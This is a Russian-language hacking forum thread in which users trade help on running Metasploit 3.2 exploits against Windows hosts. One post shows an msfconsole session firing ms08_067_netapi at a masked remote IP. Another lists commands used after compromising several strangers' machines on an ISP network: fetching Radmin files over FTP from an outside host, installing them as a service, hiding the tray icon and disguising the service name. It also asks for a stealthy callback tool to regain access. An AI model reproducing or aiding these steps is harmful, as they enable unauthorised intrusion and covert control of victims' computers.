Кто нибудь нашел решение кодировки в Windows (а то такая же хрень как в соседнем топике)не могу добавить usera в Администраторы.Зарание сенкс
Вот почитай, сразу все поймешь. К статье так же прилагаеться дополнение как настроить свой ftp server Serv-U. Все просто. >>> [ссыль]
Все тот же вопрос по кодировке в консоле(насет остальных вопросов спасибо обьяснили)я конечно прочитал соседний топик, но внятного ответа на свой вопрос так и не нашел,может кто нибудь поможет мне разобраться?Да и еще ,а в линуксе так же дело обстоит с кракозяблами?
в папке, где установлен Metasploit есть архив msf32.tar, открываешь его, msf32 -> modules -> exploits -> и дальше ищешь что нада.
Для win все легко и просто и без разжевываний ясно. Я вот мучаюсь с его использованием на лине(fedora10),для него требутся Ruby(собрал,работает). Как metasploit через Ruby запустить?
У меня последнее время возникла проблема. После команды exploit, все работает но только локально : 195.345.34.1/sfet . Но в строке url http://0.0.0.0/sfet Что может быть?
Приветсвую! Проблема такая использую метасплоит 3.2 из консоли на удаленном линуксовом серваке. msf > use windows/smb/ms08_067_netapi msf exploit(ms08_067_netapi) > set PAYLOAD generic/shell_bind_tcp PAYLOAD => generic/shell_bind_tcp msf exploit(ms08_067_netapi) > set LHOST 4444 LHOST => 4444 msf exploit(ms08_067_netapi) > set RHOST *.*.*.* RHOST => *.*.*.* msf exploit(ms08_067_netapi) > exploit [*] Started bind handler [*] Automatically detecting the target... [*] Fingerprint: Windows XP Service Pack 2 - lang:Russian [*] Selected Target: Windows XP SP2 Russian (NX) [-] Exploit failed: uninitialized constant Msf::ModuleSet::NDR [*] Exploit completed, but no session was created. И так постоянно. Что это за ошибка? Когда хакаю свою VMWare этого нет спокойно получаю консоль
Всем приятного время суток. Мона попросить вас накидать мне ссылок на видео или мануал по добавлению экплойтов в метасплойт 3.2 под виндой (хоть на английском..). Уже везде искал всё какие-та тупые мануалы и ничево дельново. Гугл заметных результатов тоже не дал.. Заранее спс и респект всем
Я делаю так: сохраняю файл, к примеру, http://www.metasploit.com/svn/framework3/trunk/modules/exploits/windows/browser/ms09_002_memory_corruption.rb, в C:\Documents and Settings\Admin\Application Data\msf32\modules\exploits\windows\browser\ms09_002_memory_corruption.rb, перзапускаю и готово
А что дальше? Здравствуйте, у меня есть пара вопросов, касающихся установки радмина на хост, который имеет динамический ip. 1) Я ищу бажные компы с помощью сплоита SMB(ms08_067_netapi) в сети своего провайдера. Точнее я сначала ищу порт 445 с помощью angry ip scanner (находятся много хостов), а потом через консоль нахожу бажный хост. Найдя какой-нибудь бажный WinXP sp2, я получаю командную строку. И после этого хз что делать. Я делаю так Code: cmd> ftp ***.***.***.1 cmd> user: I cmd> get r_server.exe cmd> get raddrv.dll cmd> AdmDll.dll cmd> bye cmd> r_server.exe /install /port:4899 /server cmd> REG ADD HKLM\SYSTEM\RAdmin\v2.0\Server\Parameters /v DisableTrayIcon /t REG_BINARY /d 00000001 /f cmd>CMD>REG ADD HKLM\SYSTEM\CurrentControlSet\Services\r_server /v DisplayName /t REG_SZ /d "Service Host Controller" /f cmd>r_server.exe /start Потом через tasklist вижу свой процесс, но с помощью RViewer подключиться не могу. Пробовал останавливать сначала wscsvc, потом sharedaccess. Я уже на компах 5 так сделал, получается одно и тоже. -------------------------------------------------------------- 2)IP динамические, есть ли какая-нибудь прога, которая будет отстукиваться, допустим, мне на скрипт, лежащий на сервере? Смотрел в гугле, но толком ничего не нашел, ибо надо что-то скрытное и не нуждающееся в крипторах. Просто все те машины, которые я ломал позавчера, уже хз под каким ip, а я хочу их доделать )) 3) Когда запускаю terminal.exe на сервере, что происходит? Открывается порт для удаленного рабочего стола и добавляется мультиюзерность в системе? Я просто запускаю этот файл, потом перезагружаю серв, и могу подключиться к нему через удаленный рабочий стол?
Подскажите пожалуйста, а как теперь реализовать атаку, только уже на чужую машину? В смысле, дать ip жертве и чтобы оно зашла. Это должен быть ip какого-то сайта?
Тут такой вопрос назрел - как в шелл-строке поменять кодировку? Ибо в большинстве я атакую винды с русским интерфейсом, и навигация по русским папкам - проблема для меня, ибо карякули.
прошу помощи. прочитал статьи, но наткнулся на некий трансендент. итак. посканил жертву xSpider нашел вот что 445 / tcp "Microsoft DS" Серьезная уязвимость Удаленное выполнение команд (ms06-040) как использовать? >_< нашел вотета . откомпилил в *.exe что делать?) на компе стоит Metasploit Framework3.2
Сплоиты в Metasploit Framework3.2 написаны на Ruby (это интерпретатор языка Ruby) тот сплоит что ты привёл написан на Си. Зачем всё валить в одну кучу? Либо юзай MSF либо компиль милвормовские сплоиты (тот что ты привёл - староват он) и юзай.
